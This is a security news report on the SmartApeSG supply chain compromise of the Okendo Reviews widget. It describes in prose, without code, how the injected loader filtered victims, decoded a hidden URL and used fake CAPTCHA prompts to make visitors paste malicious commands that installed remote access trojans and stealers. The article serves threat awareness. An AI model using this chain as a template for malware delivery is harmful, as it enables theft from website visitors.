SmartApeSG Campaign Compromises Okendo Reviews Widget in Widespread Supply Chain Attack
Threat actors injected malicious JavaScript into the Okendo Reviews widget, a platform used by over 18,000 e-commerce sites, to deliver remote access trojans and info-stealers via fake CAPTCHA prompts.
A supply chain attack against the Okendo Reviews widget has exposed thousands of e-commerce websites and their visitors to malware, according to a report from Zscaler ThreatLabz. The SmartApeSG threat actor, also known as ZPHP or HANEYMANEY, injected obfuscated JavaScript into the legitimate widget script. Because the widget is embedded on homepages, product pages, and review forms across more than 18,000 brands, the malicious code had a broad and silent reach without requiring individual site breaches.
Zscaler ThreatLabz first detected the malicious activity on May 14, 2026, when its platform recorded a surge in traffic linked to SmartApeSG. The injected JavaScript acted as a staged loader, moving through several checks before delivering additional payloads. One of the key features was a User-Agent filter that allowed the attack to target only desktop users, as later stages required Windows-based interactions. The script also used localStorage to avoid executing multiple times on the same device.
The malicious code employed an XOR-based decoding routine to reconstruct a hidden URL, which loaded a second-stage script. Victims who passed all filters were presented with a fake CAPTCHA or verification screen—a technique known as ClickFix. This prompt instructed users to open the Windows Run menu and paste a command that had been secretly copied to their clipboard. The command then downloaded a PowerShell script or HTML Application file that installed a remote access tool or information stealer.
The final payloads included NetSupport RAT, Remcos RAT, StealC, and Sectop RAT. These tools give attackers full remote control over an infected computer or allow them to steal passwords and financial credentials. The campaign demonstrates how threat actors can leverage trusted third-party integrations to distribute malware at scale without compromising each target site individually.
Zscaler ThreatLabz observed the compromised widget on websites ranging from mid-sized online stores to major retail brands. Traffic estimates for affected sites ranged from about 150,000 to several million monthly visitors. One impacted U.S. retail brand alone draws approximately 7 million visitors per month. On May 14, Zscaler's platform recorded nearly 15,000 blocks tied to SmartApeSG in a single day.
Okendo confirmed it was aware of the issue and restored the widget script to a clean state after Zscaler reported the incident. However, the window during which the malicious script was live may have exposed a significant number of visitors. The attack highlights the risk posed by third-party scripts on high-traffic e-commerce sites and the importance of monitoring supply chain integrations.